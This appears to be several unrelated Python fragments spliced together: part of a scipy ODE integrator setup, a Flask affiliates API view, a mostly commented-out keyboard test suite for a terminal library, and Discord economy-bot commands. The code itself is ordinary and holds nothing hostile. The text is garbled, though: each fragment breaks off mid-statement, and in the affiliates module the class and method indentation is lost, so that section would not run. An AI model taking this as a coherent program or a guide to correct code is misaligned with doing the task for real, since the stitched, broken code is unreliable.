        int_mthd, step_fct = ('dopri5', 150) if small_step else ('dop853', 50)
        first_step = norm(ham, 'f') / step_fct
        # NOTE(review): the meaning of nsteps=0 here should be confirmed
        # against the scipy.integrate.ode documentation.
        self._stepper.set_integrator(int_mthd, nsteps=0, first_step=first_step)
        # Set step_callback to be evaluated with args (t, y) at each step
        if self._int_step_callback is not None:
            self._stepper.set_solout(self._int_step_callback)
        self._stepper.set_initial_value(self._p0.A.reshape(-1), self.t0)
        # assign the correct update_to method
        self._update_method = self._update_to_integrate
        self._solved = False
# Methods for updating the | |
# <gh_stars>1-10
"""
**Module - View Controller for Affiliates API**
*Class Definitions for managing access to the database and validation of user input*
"""
__developer__ = "mobius-crypt"
__email__ = "<EMAIL>"
__twitter__ = "@blueitserver"
__github_repo__ = "https://github.com/freelancing-solutions/memberships-and-affiliate-api"
__github_profile__ = "https://github.com/freelancing-solutions/"
import typing
from typing import Optional, List
from flask import current_app, jsonify
from google.cloud import ndb
from _sdk._email import Mailgun
from cache.cache_manager import app_cache
from config.exception_handlers import handle_view_errors
from config.exceptions import DataServiceError, InputError, UnAuthenticatedError, error_codes, status_codes
from config.use_context import use_context
from database.affiliates import Affiliates, Recruits, EarningsData
from database.affiliates import AffiliatesValidators as ValidAffiliate
from database.affiliates import EarningsValidators as ValidEarnings
from database.affiliates import RecruitsValidators as ValidRecruit
from utils.utils import create_id, return_ttl
# from cache.cache_manager import CacheManager
class AffiliatesEmails(Mailgun):
    """
    **Class AffiliatesEmails**
        Sends email notifications to affiliates when certain actions must be
        taken or updates have occurred.  All transport work is inherited from
        the Mailgun base class.
    """
    def __init__(self):
        # Let Mailgun wire up the transport, then record the provider tag.
        super(AffiliatesEmails, self).__init__()
        self._send_with: str = 'mailgun'
        # TODO add more email providers here
# TODO Create Test Cases for Affiliates View and Documentations
# Don't Edit, Just Watch -- can you see this
class Validator(ValidAffiliate, ValidRecruit, ValidEarnings):
    """
    **Class Validator**
        Gathers validator classes needed for validating actions and input on
        while managing Affiliates.
    """
    def __init__(self):
        super(Validator, self).__init__()
    # noinspection PyTypeChecker
    def can_register_affiliate(self, organization_id: str, uid: str) -> bool:
        """
        **can_register_affiliate**
            returns true if user can add an affiliate into this organization
        :param organization_id: id of the recruiting organization (required, non-blank)
        :param uid: id of the user being recruited (required, non-blank)
        :return: True when the user is not already a registered affiliate
        :raises InputError: on missing/blank arguments
        :raises DataServiceError: when registration status cannot be determined
        """
        if not isinstance(organization_id, str) or not bool(organization_id.strip()):
            message: str = "organization_id is required"
            raise InputError(
                status=error_codes.input_error_code, description=message)
        if not isinstance(uid, str) or not bool(uid.strip()):
            message: str = "uid is required"
            raise InputError(
                status=error_codes.input_error_code, description=message)
        # this means the user recruiting this affiliate is already a registered affiliate
        already_registered: typing.Union[bool, None] = self.recruiter_registered(organization_id=organization_id,
                                                                                 uid=uid)
        if isinstance(already_registered, bool):
            return not already_registered
        message: str = "Unable to verify input data, due to database error, please try again later"
        raise DataServiceError(
            status=error_codes.data_service_error_code, description=message)
    def _create_unique_affiliate_id(self) -> str:
        """
        **_create_unique_affiliate_id**
            returns an id that does not conflict with any existing affiliate id
        :return: a globally unique affiliate_id
        """
        _id = create_id()
        affiliate_instance: Affiliates = Affiliates.query(
            Affiliates.affiliate_id == _id).get()
        # BUG FIX: the original dereferenced `affiliate_instance.uid`, which
        # raises AttributeError when no affiliate matched (the common case)
        # and compared the wrong field.  Retry only when the id is taken.
        return self._create_unique_affiliate_id() if affiliate_instance is not None else _id
# noinspection DuplicatedCode
class AffiliatesView(Validator):
"""
**Class AffiliatesView**
Enables the api to access methods to access data and create and update affiliates
also insures that input is validated and users are authenticated
"""
def __init__(self):
    """Set up datastore retry/timeout limits from the Flask application config."""
    super(AffiliatesView, self).__init__()
    config = current_app.config
    self._max_retries = config.get('DATASTORE_RETRIES')
    self._max_timeout = config.get('DATASTORE_TIMEOUT')
@use_context
@handle_view_errors
def register_affiliate(self, affiliate_data: dict) -> tuple:
    """
    **register_affiliate**
    Register a new affiliate. affiliate_data must contain the uid of the affiliate
    being recruited and the organization_id of the organization recruiting the affiliate.
    :param affiliate_data: dict with at least uid and organization_id
    :return: tuple of (json response, status code) carrying the registered affiliate
    :raises UnAuthenticatedError: when the recruiter may not register an affiliate
    :raises DataServiceError: when the datastore write fails
    """
    uid: Optional[str] = affiliate_data.get('uid')
    organization_id: Optional[str] = affiliate_data.get('organization_id')
    # NOTE: can_register_affiliate validates organization_id and uid and raises
    # InputError on missing/blank values
    if not self.can_register_affiliate(organization_id=organization_id, uid=uid):
        message: str = "You are not authorized to register as an affiliate"
        raise UnAuthenticatedError(
            status=error_codes.un_auth_error_code, description=message)
    # NOTE: this creates a globally unique Affiliate Key
    affiliate_id: str = self._create_unique_affiliate_id()
    # BUG FIX: the generated affiliate_id was previously discarded — the entity
    # was built from affiliate_data alone, so the stored record never carried the
    # unique key.  The input dict is copied so the caller's data is not mutated.
    affiliate_instance: Affiliates = Affiliates(
        **dict(affiliate_data, affiliate_id=affiliate_id))
    key: Optional[ndb.Key] = affiliate_instance.put(
        retries=self._max_retries, timeout=self._max_timeout)
    if not isinstance(key, ndb.Key):
        message: str = "There was an error creating Affiliate"
        raise DataServiceError(
            status=error_codes.data_service_error_code, description=message)
    # schedule deletion of stale affiliate caches for this organization
    _kwargs: dict = dict(
        affiliates_view=self, organization_id=organization_id, affiliate_id=affiliate_id)
    app_cache._schedule_cache_deletion(
        func=app_cache._delete_affiliate_cache, kwargs=_kwargs)
    return jsonify({'status': True,
                    'message': 'successfully registered an affiliate',
                    'payload': affiliate_instance.to_dict()}), status_codes.successfully_updated_code
@use_context
@handle_view_errors
def total_recruits(self, affiliate_data: dict, add: int = 0) -> tuple:
    """
    **total_recruits**
    given an existing affiliate, add `add` to the total_recruits field of the record.
    :param affiliate_data: dict containing affiliate_id and organization_id
    :param add: amount to add to total_recruits (an int; may be 0)
    :return: tuple of (json response, status code)
    :raises InputError: when any of affiliate_id, organization_id or add is invalid
    :raises DataServiceError: when the datastore write fails
    """
    affiliate_id: Optional[str] = affiliate_data.get('affiliate_id')
    organization_id: Optional[str] = affiliate_data.get('organization_id')
    if not isinstance(affiliate_id, str) or not bool(affiliate_id.strip()):
        message: str = 'affiliate_id is required'
        raise InputError(
            status=error_codes.input_error_code, description=message)
    if not isinstance(organization_id, str) or not bool(organization_id.strip()):
        message: str = 'organization_id is required'
        raise InputError(
            status=error_codes.input_error_code, description=message)
    if not isinstance(add, int):
        message: str = "add: amount to update total_recruits is required"
        raise InputError(
            status=error_codes.input_error_code, description=message)
    affiliate_instance: Affiliates = Affiliates.query(Affiliates.organization_id == organization_id,
                                                      Affiliates.affiliate_id == affiliate_id).get()
    if not (isinstance(affiliate_instance, Affiliates) and bool(affiliate_instance)):
        return jsonify({'status': False, 'message': 'Failed to locate affiliate'}), status_codes.data_not_found_code
    affiliate_instance.total_recruits += add
    key = affiliate_instance.put(
        retries=self._max_retries, timeout=self._max_timeout)
    if not isinstance(key, ndb.Key):
        message: str = "Something went wrong while updating affiliate"
        # CONSISTENCY FIX: use the shared error code rather than a hard-coded 500
        raise DataServiceError(
            status=error_codes.data_service_error_code, description=message)
    # BUG FIX: pass this view instance (not the AffiliatesView class object) to
    # the cache-deletion job, matching register_affiliate
    _kwargs: dict = dict(affiliates_view=self, organization_id=organization_id,
                         affiliate_id=affiliate_id)
    app_cache._schedule_cache_deletion(
        func=app_cache._delete_affiliate_cache, kwargs=_kwargs)
    return jsonify({'status': True,
                    'message': 'successfully incremented total recruits',
                    'payload': affiliate_instance.to_dict()}), status_codes.successfully_updated_code
@use_context
@handle_view_errors
def delete_affiliate(self, affiliate_data: dict) -> tuple:
    """
    **delete_affiliate**
    soft-delete an affiliate record (marks it deleted and inactive; nothing is
    removed from the datastore).
    :param affiliate_data: dict containing affiliate_id and organization_id
    :return: tuple containing the record of the deleted affiliate
    :raises InputError: when affiliate_id or organization_id is missing/blank
    :raises DataServiceError: when the datastore write fails
    """
    affiliate_id: Optional[str] = affiliate_data.get('affiliate_id')
    if not isinstance(affiliate_id, str) or not bool(affiliate_id.strip()):
        message: str = 'affiliate_id is required'
        raise InputError(
            status=error_codes.input_error_code, description=message)
    organization_id: Optional[str] = affiliate_data.get('organization_id')
    if not isinstance(organization_id, str) or not bool(organization_id.strip()):
        message: str = 'organization_id is required'
        raise InputError(
            status=error_codes.input_error_code, description=message)
    affiliate_instance: Affiliates = Affiliates.query(Affiliates.organization_id == organization_id,
                                                      Affiliates.affiliate_id == affiliate_id).get()
    if not (isinstance(affiliate_instance, Affiliates) and bool(affiliate_instance)):
        message: str = "Affiliate not found: delete operation cannot be completed"
        return jsonify({'status': False, 'message': message}), status_codes.data_not_found_code
    # soft delete: flag the record rather than removing it
    affiliate_instance.is_active = False
    affiliate_instance.is_deleted = True
    key: Optional[ndb.Key] = affiliate_instance.put(
        retries=self._max_retries, timeout=self._max_timeout)
    if not isinstance(key, ndb.Key):
        message: str = 'something went wrong while deleting affiliate'
        raise DataServiceError(
            status=error_codes.data_service_error_code, description=message)
    # BUG FIX: pass this view instance (not the AffiliatesView class object) to
    # the cache-deletion job, matching register_affiliate
    _kwargs: dict = dict(affiliates_view=self, organization_id=organization_id,
                         affiliate_id=affiliate_id)
    app_cache._schedule_cache_deletion(
        func=app_cache._delete_affiliate_cache, kwargs=_kwargs)
    return jsonify({'status': True,
                    'message': 'successfully deleted the affiliate',
                    'payload': affiliate_instance.to_dict()}), status_codes.successfully_updated_code
@use_context
@handle_view_errors
def mark_active(self, affiliate_data: dict, is_active: bool) -> tuple:
    """
    **mark_active**
    set the is_active flag of an affiliate.
    the action is refused when the affiliate has been soft-deleted.
    :param affiliate_data: contains affiliate_id and organization_id
    :param is_active: the new active state
    :return: tuple of (json response, status code)
    :raises InputError: when affiliate_id or organization_id is missing/blank
    :raises ValueError: when is_active is not a boolean
    :raises UnAuthenticatedError: when activating a soft-deleted affiliate
    :raises DataServiceError: when the datastore write fails
    """
    affiliate_id: Optional[str] = affiliate_data.get('affiliate_id')
    if not isinstance(affiliate_id, str) or not bool(affiliate_id.strip()):
        message: str = 'affiliate_id is required'
        raise InputError(
            status=error_codes.input_error_code, description=message)
    organization_id: Optional[str] = affiliate_data.get('organization_id')
    if not isinstance(organization_id, str) or not bool(organization_id.strip()):
        message: str = 'organization_id is required'
        raise InputError(
            status=error_codes.input_error_code, description=message)
    if not isinstance(is_active, bool):
        raise ValueError("is_active is required and can only be a boolean")
    affiliate_instance: Affiliates = Affiliates.query(Affiliates.organization_id == organization_id,
                                                      Affiliates.affiliate_id == affiliate_id).get()
    if not (isinstance(affiliate_instance, Affiliates) and bool(affiliate_instance)):
        message: str = "Affiliate Not Found: Unable to update record"
        return jsonify({'status': False, 'message': message}), status_codes.data_not_found_code
    if affiliate_instance.is_deleted and is_active:
        message: str = "cannot activate / de-activate an affiliate if the affiliate has been deleted"
        raise UnAuthenticatedError(
            status=error_codes.un_auth_error_code, description=message)
    affiliate_instance.is_active = is_active
    key: Optional[ndb.Key] = affiliate_instance.put(
        retries=self._max_retries, timeout=self._max_timeout)
    state: str = 'active' if is_active else 'inactive'
    if not isinstance(key, ndb.Key):
        # BUG FIX: message previously always said "in-active" regardless of is_active
        message: str = "An Unknown Error occurred while trying to mark affiliate as {}".format(state)
        raise DataServiceError(
            status=error_codes.data_service_error_code, description=message)
    # BUG FIX: pass this view instance (not the AffiliatesView class object) to
    # the cache-deletion job, matching register_affiliate
    _kwargs: dict = dict(affiliates_view=self, organization_id=organization_id,
                         affiliate_id=affiliate_id)
    app_cache._schedule_cache_deletion(
        func=app_cache._delete_affiliate_cache, kwargs=_kwargs)
    # BUG FIX: success message previously always said "inactive"
    return jsonify({'status': True,
                    'message': 'successfully marked affiliate as {}'.format(state),
                    'payload': affiliate_instance.to_dict()}), status_codes.successfully_updated_code
@use_context
@handle_view_errors
@app_cache.cache.memoize(timeout=return_ttl('short'))
def get_affiliate(self, affiliate_data: dict) -> tuple:
"""
**get_affiliate**
obtains a record of one affiliate from the store. given either uid or affiliate_id, organization_id
must be valid
:param affiliate_data: contains affiliate_id and organization_id the affiliate must belong to the organization
:return: response contain affiliate record
"""
organization_id: Optional[str] = affiliate_data.get('organization_id')
if not isinstance(organization_id, str) or not bool(organization_id.strip()):
message: str = 'organization_id is required'
raise InputError(
status=error_codes.input_error_code, description=message)
affiliate_id: Optional[str] = affiliate_data.get('affiliate_id')
# Initializing affiliate_instance to None in order to allow testing for valid data
affiliate_instance: Optional[Affiliates] = None
valid_input: bool = False
# NOTE this means if affiliate_id is valid
if isinstance(affiliate_id, str) and bool(affiliate_id.strip()):
valid_input = True
affiliate_instance = Affiliates.query(Affiliates.organization_id == organization_id,
Affiliates.affiliate_id == affiliate_id).get()
uid: Optional[str] = affiliate_data.get('uid')
if isinstance(uid, str) and bool(uid.strip()):
valid_input = True
affiliate_instance = Affiliates.query(Affiliates.organization_id == organization_id,
Affiliates.uid == uid).get()
# if we are here and still dont have a valid input set to true then we have a problem with input data
if not valid_input:
message: str = "affiliate_id or uid is required to get affiliate record"
raise InputError(
status=error_codes.input_error_code, description=message)
# Note checking if we have | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
"Tests for keyboard support."
# std imports
import functools
import tempfile
import signal
import curses
#import time
import math
import tty # NOQA
import pty
import sys
import os
# local
from .accessories import (
init_subproc_coverage,
read_until_eof,
read_until_semaphore,
SEND_SEMAPHORE,
RECV_SEMAPHORE,
as_subprocess,
TestTerminal,
SEMAPHORE,
all_terms,
echo_off,
)
# 3rd-party
import pytest
import mock
import six
if sys.version_info[0] == 3:
unichr = chr
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_kbhit_interrupted():
# "kbhit() should not be interrupted with a signal handler."
# pid, master_fd = pty.fork()
# if pid == 0:
# cov = init_subproc_coverage('test_kbhit_interrupted')
#
# # child pauses, writes semaphore and begins awaiting input
# global got_sigwinch
# got_sigwinch = False
#
# def on_resize(sig, action):
# global got_sigwinch
# got_sigwinch = True
#
# term = TestTerminal()
# signal.signal(signal.SIGWINCH, on_resize)
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.raw():
# assert term.inkey(timeout=1.05) == u''
# os.write(sys.__stdout__.fileno(), b'complete')
# assert got_sigwinch
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# read_until_semaphore(master_fd)
# stime = time.time()
# os.kill(pid, signal.SIGWINCH)
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'complete'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 1.0
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_kbhit_interrupted_nonetype():
# "kbhit() should also allow interruption with timeout of None."
# pid, master_fd = pty.fork()
# if pid == 0:
# cov = init_subproc_coverage('test_kbhit_interrupted_nonetype')
#
# # child pauses, writes semaphore and begins awaiting input
# global got_sigwinch
# got_sigwinch = False
#
# def on_resize(sig, action):
# global got_sigwinch
# got_sigwinch = True
#
# term = TestTerminal()
# signal.signal(signal.SIGWINCH, on_resize)
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.raw():
# term.inkey(timeout=1)
# os.write(sys.__stdout__.fileno(), b'complete')
# assert got_sigwinch
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# read_until_semaphore(master_fd)
# stime = time.time()
# time.sleep(0.05)
# os.kill(pid, signal.SIGWINCH)
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'complete'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 1.0
def test_break_input_no_kb():
    "cbreak() should not call tty.setcbreak() without keyboard."
    @as_subprocess
    def subproc():
        with tempfile.NamedTemporaryFile() as stream:
            terminal = TestTerminal(stream=stream)
            with mock.patch("tty.setcbreak") as patched_setcbreak:
                with terminal.cbreak():
                    assert patched_setcbreak.called is False
                assert terminal._keyboard_fd is None
    subproc()
def test_raw_input_no_kb():
    "raw should not call tty.setraw() without keyboard."
    @as_subprocess
    def subproc():
        with tempfile.NamedTemporaryFile() as stream:
            terminal = TestTerminal(stream=stream)
            with mock.patch("tty.setraw") as patched_setraw:
                with terminal.raw():
                    assert patched_setraw.called is False
                assert terminal._keyboard_fd is None
    subproc()
def test_raw_input_with_kb():
    "raw should call tty.setraw() when with keyboard."
    @as_subprocess
    def subproc():
        terminal = TestTerminal()
        assert terminal._keyboard_fd is not None
        with mock.patch("tty.setraw") as patched_setraw:
            with terminal.raw():
                assert patched_setraw.called
    subproc()
def test_notty_kb_is_None():
    "term._keyboard_fd should be None when os.isatty returns False."
    # scenario: stream is sys.__stdout__ but os.isatty(0) is False,
    # such as when piping output to less(1)
    @as_subprocess
    def subproc():
        with mock.patch("os.isatty") as fake_isatty:
            fake_isatty.return_value = False
            terminal = TestTerminal()
            assert terminal._keyboard_fd is None
    subproc()
#def test_kbhit_no_kb():
# "kbhit() always immediately returns False without a keyboard."
# @as_subprocess
# def child():
# term = TestTerminal(stream=six.StringIO())
# stime = time.time()
# assert term._keyboard_fd is None
# assert not term.kbhit(timeout=1.1)
# assert math.floor(time.time() - stime) == 1.0
# child()
#
#
#def test_keystroke_0s_cbreak_noinput():
# "0-second keystroke without input; '' should be returned."
# @as_subprocess
# def child():
# term = TestTerminal()
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=0)
# assert (inp == u'')
# assert (math.floor(time.time() - stime) == 0.0)
# child()
#
#
#def test_keystroke_0s_cbreak_noinput_nokb():
# "0-second keystroke without data in input stream and no keyboard/tty."
# @as_subprocess
# def child():
# term = TestTerminal(stream=six.StringIO())
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=0)
# assert (inp == u'')
# assert (math.floor(time.time() - stime) == 0.0)
# child()
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_keystroke_1s_cbreak_noinput():
# "1-second keystroke without input; '' should be returned after ~1 second."
# @as_subprocess
# def child():
# term = TestTerminal()
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=1)
# assert (inp == u'')
# assert (math.floor(time.time() - stime) == 1.0)
# child()
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_keystroke_1s_cbreak_noinput_nokb():
# "1-second keystroke without input or keyboard."
# @as_subprocess
# def child():
# term = TestTerminal(stream=six.StringIO())
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=1)
# assert (inp == u'')
# assert (math.floor(time.time() - stime) == 1.0)
# child()
#
#
#def test_keystroke_0s_cbreak_with_input():
# "0-second keystroke with input; Keypress should be immediately returned."
# pid, master_fd = pty.fork()
# if pid == 0:
# cov = init_subproc_coverage('test_keystroke_0s_cbreak_with_input')
# # child pauses, writes semaphore and begins awaiting input
# term = TestTerminal()
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# inp = term.inkey(timeout=0)
# os.write(sys.__stdout__.fileno(), inp.encode('utf-8'))
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# os.write(master_fd, u'x'.encode('ascii'))
# read_until_semaphore(master_fd)
# stime = time.time()
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'x'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#def test_keystroke_cbreak_with_input_slowly():
# "0-second keystroke with input; Keypress should be immediately returned."
# pid, master_fd = pty.fork()
# if pid == 0:
# cov = init_subproc_coverage('test_keystroke_cbreak_with_input_slowly')
# # child pauses, writes semaphore and begins awaiting input
# term = TestTerminal()
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# while True:
# inp = term.inkey(timeout=0.5)
# os.write(sys.__stdout__.fileno(), inp.encode('utf-8'))
# if inp == 'X':
# break
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# os.write(master_fd, u'a'.encode('ascii'))
# time.sleep(0.1)
# os.write(master_fd, u'b'.encode('ascii'))
# time.sleep(0.1)
# os.write(master_fd, u'cdefgh'.encode('ascii'))
# time.sleep(0.1)
# os.write(master_fd, u'X'.encode('ascii'))
# read_until_semaphore(master_fd)
# stime = time.time()
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'abcdefghX'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#def test_keystroke_0s_cbreak_multibyte_utf8():
# "0-second keystroke with multibyte utf-8 input; should decode immediately."
# # utf-8 bytes represent "latin capital letter upsilon".
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_keystroke_0s_cbreak_multibyte_utf8')
# term = TestTerminal()
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# inp = term.inkey(timeout=0)
# os.write(sys.__stdout__.fileno(), inp.encode('utf-8'))
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# os.write(master_fd, u'\u01b1'.encode('utf-8'))
# read_until_semaphore(master_fd)
# stime = time.time()
# output = read_until_eof(master_fd)
# pid, status = os.waitpid(pid, 0)
# assert output == u'Ʊ'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#@pytest.mark.skipif(os.environ.get('TRAVIS', None) is not None,
# reason="travis-ci does not handle ^C very well.")
#def test_keystroke_0s_raw_input_ctrl_c():
# "0-second keystroke with raw allows receiving ^C."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_keystroke_0s_raw_input_ctrl_c')
# term = TestTerminal()
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# with term.raw():
# os.write(sys.__stdout__.fileno(), RECV_SEMAPHORE)
# inp = term.inkey(timeout=0)
# os.write(sys.__stdout__.fileno(), inp.encode('latin1'))
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# # ensure child is in raw mode before sending ^C,
# read_until_semaphore(master_fd)
# os.write(master_fd, u'\x03'.encode('latin1'))
# stime = time.time()
# output = read_until_eof(master_fd)
# pid, status = os.waitpid(pid, 0)
# assert (output == u'\x03' or
# output == u'' and not os.isatty(0))
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#def test_keystroke_0s_cbreak_sequence():
# "0-second keystroke with multibyte sequence; should decode immediately."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_keystroke_0s_cbreak_sequence')
# term = TestTerminal()
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# inp = term.inkey(timeout=0)
# os.write(sys.__stdout__.fileno(), inp.name.encode('ascii'))
# sys.stdout.flush()
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, u'\x1b[D'.encode('ascii'))
# read_until_semaphore(master_fd)
# stime = time.time()
# output = read_until_eof(master_fd)
# pid, status = os.waitpid(pid, 0)
# assert output == u'KEY_LEFT'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_keystroke_1s_cbreak_with_input():
# "1-second keystroke w/multibyte sequence; should return after ~1 second."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_keystroke_1s_cbreak_with_input')
# term = TestTerminal()
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# inp = term.inkey(timeout=3)
# os.write(sys.__stdout__.fileno(), inp.name.encode('utf-8'))
# sys.stdout.flush()
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# read_until_semaphore(master_fd)
# stime = time.time()
# time.sleep(1)
# os.write(master_fd, u'\x1b[C'.encode('ascii'))
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'KEY_RIGHT'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 1.0
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_esc_delay_cbreak_035():
# "esc_delay will cause a single ESC (\\x1b) to delay for 0.35."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_esc_delay_cbreak_035')
# term = TestTerminal()
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=5)
# measured_time = (time.time() - stime) * 100
# os.write(sys.__stdout__.fileno(), (
# '%s %i' % (inp.name, measured_time,)).encode('ascii'))
# sys.stdout.flush()
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# read_until_semaphore(master_fd)
# stime = time.time()
# os.write(master_fd, u'\x1b'.encode('ascii'))
# key_name, duration_ms = read_until_eof(master_fd).split()
#
# pid, status = os.waitpid(pid, 0)
# assert key_name == u'KEY_ESCAPE'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
# assert 34 <= int(duration_ms) <= 45, duration_ms
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_esc_delay_cbreak_135():
# "esc_delay=1.35 will cause a single ESC (\\x1b) to delay for 1.35."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_esc_delay_cbreak_135')
# term = TestTerminal()
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=5, esc_delay=1.35)
# measured_time = (time.time() - stime) * 100
# os.write(sys.__stdout__.fileno(), (
# '%s %i' % (inp.name, measured_time,)).encode('ascii'))
# sys.stdout.flush()
# if cov is not None:
# cov.stop()
# cov.save()
# | |
= embed)
@commands.command(aliases=["pm"], description="Use your laptop to post some reddit memes")
@commands.check(custom_cooldown(1,30,1,12,BucketType.user))
async def postmeme(self, ctx):
    """Prompt the player for a meme type and pay 0-2999 coins into their wallet."""
    await self.check_acc(ctx.author)
    data = await self.bc.economy.find(ctx.author.id)
    # one-letter answers accepted from the prompt below
    choices = ["d", "a", "n", "k"]
    res = await self.check_for(ctx.author, "laptop")
    if not res[0]:
        if res[1] == 2:
            return await ctx.send("You do not have a laptop!")
        # NOTE(review): when res[0] is False but res[1] != 2 the command continues
        # anyway — presumably check_for reports/handles other failure codes itself;
        # confirm this fall-through is intentional
    await ctx.send("""
- `D` **Dank meme**
- `A` **A meme**
- `N` **Normie meme**
- `K` **Kool meme**
""")
    def check(msg):
        # only accept a reply from the invoking user in the same channel
        return msg.author == ctx.author and msg.channel == ctx.channel
    try:
        msg = await self.bc.wait_for("message", check=check, timeout=10)
    except asyncio.TimeoutError:
        return await ctx.send("Your choices have timed out")
    else:
        if msg.content.lower() in choices:
            # randrange upper bound is exclusive: earnings are 0..2999
            earnings = random.randrange(0, 3000)
            data["wallet"] += earnings
            await ctx.send("You posted your meme and you got **{}** coins from it".format(earnings))
            await self.upsert(data)
        else:
            return await ctx.send("You did not enter the choices right")
@commands.command(description="Start all over again with a few buffs")
async def prestige(self, ctx):
    """Reset the player's wallet, bank and inventory in exchange for a prestige
    level and tiered starter gear. Requires at least 5 million coins in the wallet."""
    await self.check_acc(ctx.author)
    data = await self.bc.economy.find(ctx.author.id)
    if "prestige" not in data:
        data["prestige"] = 0
    # BUG FIX: was `<= 5000000`, which rejected a wallet of exactly 5 million
    # even though the message says 5 million is the requirement
    if data["wallet"] < 5000000:
        return await ctx.send("You do not have 5 million coins to prestige!")
    data["prestige"] += 1
    embed = discord.Embed(
        title = "Prestige Rewards",
        description = "**You have now reached prestige {}**\nYour inventory and coins have been reset but you get the following things:".format(data["prestige"]),
        color = random.choice(self.bc.color_list)
    )
    # BUG FIX: the old checks range(0, 6) / range(5, 11) / `> 15` overlapped at
    # prestige 5 and left prestige 11-15 with no reset or rewards at all; the
    # tiers are now contiguous: 1-5, 6-15, 16+
    if data["prestige"] <= 5:
        data["bag"] = [{'name': 'Laptop', 'id': 'laptop', 'amount': 1}, {'name': 'Fishing Pole', 'id': 'fishingpole', 'amount': 1}, {'name': 'Basic Lootbox', 'id': 'lootbox', 'amount': 1}]
        data["wallet"] = 0
        data["bank"] = 0
        data["banklimit"] = 75000
        embed.add_field(name="Rewards", value="Laptop x1\nFishing Pole x1\nBasic Lootbox x1\n\nStarter Bank Space: 75k")
    elif data["prestige"] <= 15:
